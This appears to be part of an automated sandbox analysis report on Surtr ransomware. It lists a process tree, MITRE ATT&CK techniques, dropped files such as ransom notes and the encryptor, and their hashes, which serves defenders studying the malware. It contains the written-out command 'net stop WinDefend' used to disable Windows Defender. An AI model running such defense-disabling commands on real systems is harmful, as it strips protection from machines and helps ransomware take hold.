  C:\Windows\system32\cmd.exe /c net stop "WinDefend"
  2⤵
  PID:3852
- - C:\Windows\system32\net.exe
    net stop "WinDefend"
    3⤵
    PID:2188
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop "WinDefend"
      4⤵
      PID:1640

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2828

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

Clear Windows Event Logs

T1070.001

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Windows Credential Manager

T1555.004

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Share Discovery

T1135

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Time Discovery

T1124

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.msi.[[email protected]].SURT

Filesize
24.4MB

MD5
b401e28eadb915088e324e179b6a8fb8

SHA1
6434c4aba1c07c973f5e88bb3c523d7ddbd1bdbc

SHA256
45fa94211947eb26e706bd321bda00505a24d1ad8ffa375895eabc8857062223

SHA512
ce14c9df37c8633f88752c8f831358a9511a5bc492487af0668f3b5217ee78bacf6d6e18ac3152e7d4702357527b419db40895e14e92454f9e40528c8b021c44

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta

Filesize
8KB

MD5
f8e79a5519baf8d821cbe488557b0d15

SHA1
5d7d0d3c75ab41441d6e33305e594a209b8f902a

SHA256
b88beb50114e0fa17ca6c0972c76b0594f55861136024addc74b73e0ec1d9b84

SHA512
ba53ca1fab51b9927abdadfcd64301117f80961d116bde5f5380db3772f7142b396302c04f3f3bc3155d520a6e414e454ffa955b29f4ffae2f594bd4907e3083

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt

Filesize
614B

MD5
cb0687a112337502ea129e983eea56cb

SHA1
bf1284ce07e803b55cfa676e578aa1af7a5efd23

SHA256
5657a163b4504e927f03c143532f79bc800db107595773d035fbdf1f2f414a9b

SHA512
57ad289264f6c47cef5b92c5bd97264ad59292114683a71fb5604c8600ef613d8532cebaa51d6281d4a5ae3d6b00a7347f40f853d4f917fa0760a485664cd499

Download Submit
C:\ProgramData\Service\ID_DATA.surt

Filesize
14B

MD5
9d3e339d041ac666c772eb51f704447e

SHA1
8353e29e85fbae66471223f4b34136ab166c41a0

SHA256
10b5b014ee08cf7a9c77dad17af1d7246df20da5347cbd3baaa7411c870a718d

SHA512
13eaa9ec7a0bc1732de3b554867479509cbab029513594487f33a144b0406c27aec565e4c694d3c7f1018d6deb215a754587c654a545844a197ac246008d300f

Download Submit
C:\ProgramData\Service\Surtr.exe

Filesize
1.3MB

MD5
6c2b5d1e5204f83e16265da3600d48e0

SHA1
dc40c80e3444ca688779cd81a2b93964fa909b89

SHA256
805cb28b3e595afe97a6e4ac5051ca11b34d72f4dff2af4581cf74a6b126af43

SHA512
5d2eb6e70eda83e491bbc993eec57c35245a9340f6526e6e0abad3c1ebe0c3457e0efc5c6012463ece384de771bb76b3e3f0cf8357a8e71f7c7ac18d66af4e78

Download Submit
C:\ProgramData\Service\SurtrBackGround.jpg

Filesize
30KB

MD5
33f7fc301be9d39fcb474fb8b1e5f42e

SHA1
a3bf9ddb2ac53bc4b12b249825189a7c7a07b766

SHA256
99cd579177b2480dab17d125bcabe16f503b467208c2568c5564d13ffb457d03

SHA512
6cf0f2a65cc9d001087b8a685f1199ece6cd6e25f91b421a5a176ed8a1578e9b5da5fd4cd1708fc3639c30f1724e238ad6d4a2b09d45b53737468b31ddf50d00

Download Submit
C:\ProgramData\Service\SurtrIcon.ico

Filesize
78KB

MD5
3257eb22824b57fe3d58074bca3128d3

SHA1
6f60ff4e7419ccdbc3d0dedc8474a0722d7d0a97

SHA256
5afba257ff405ceb733b2b6f270a16c8e0fffe92e6c91c6554a2ea4706e8c3ad

SHA512
7b41c8714aa64bd5a3a9e782a5bda8875882182863c9dd11273c168ef2b064f2c31c6c0e9d30f9db7ff99dae0542773f9a8ef995830c427d167120711ab4878d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\Private_DATA.surt

Filesize
1KB

MD5
07a975c521c231a77702990c58aedfe6

SHA1
e36ae65c796e3850d220c224284237ce12fe5729

SHA256
d1b61b56ff070da1f01c3245a38a7c6b737e11592da59eb349be776b17b02173

SHA512
5b2c2ad2863066af2d43e05be80736853c42a9e2a9340a7413c0bfa2c2f3594507a5a871cd1bdb2535ef71f33e3a5f49a34440d371017c84c372c87c93eb86b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\Service\Public_DATA.surt

Filesize
204B

MD5
ba919ad9760d261a0cddf3a3b1a01edf

SHA1
9ace4df02a74a3c00fc007c404c82bbcbd08d818

SHA256
24afa02e976e4279d8150208c5d267e9c86f8ff7d0d7be7075eaf84b05e0bba5

SHA512
c48f730ea68efde865ba9c693367110e86284e9785870036ed4b5586f397b054edbb62e2b2c312a351e89f237847add22273c8614e6d7ac8cc8bd30d8fdf3491

Download Submit
memory/2624-0-0x0000000140000000-0x000000014015C000-memory.dmp

Filesize
1.4MB

Download